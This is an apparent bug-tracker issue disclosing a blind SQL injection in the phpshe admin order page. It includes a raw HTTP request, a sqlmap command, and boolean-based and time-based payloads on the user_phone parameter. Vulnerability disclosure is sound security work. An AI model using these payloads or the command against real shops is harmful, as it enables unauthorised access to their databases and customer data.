17 Star 49 Fork 17

koyshe / phpshe

 / 详情

I found a blind SQL injection in the background

待办的
创建于  
2018-12-26 14:38

1.admin index.php
index

2.vulnerability point
point

3.code
code

4.capture the cap
cap

5.sql injection test
test

poc:

GET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1
Host: 192.3.221.177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.3.221.177/phpshe/admin.php?mod=order
Cookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64
Connection: close

sqlmap command:
Python sqlmap.py -r 1.txt --level=3 --risk=2 --dbms=mysql --batch -p "user_phone"

injection type:

---
Parameter: user_phone (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' RLIKE (SELECT (CAS
E WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=


    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' AND (SELECT * FROM
 (SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=
---

评论 (0)

si1ence 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/koyshe/phpshe.git
git@gitee.com:koyshe/phpshe.git
koyshe
phpshe
phpshe

搜索帮助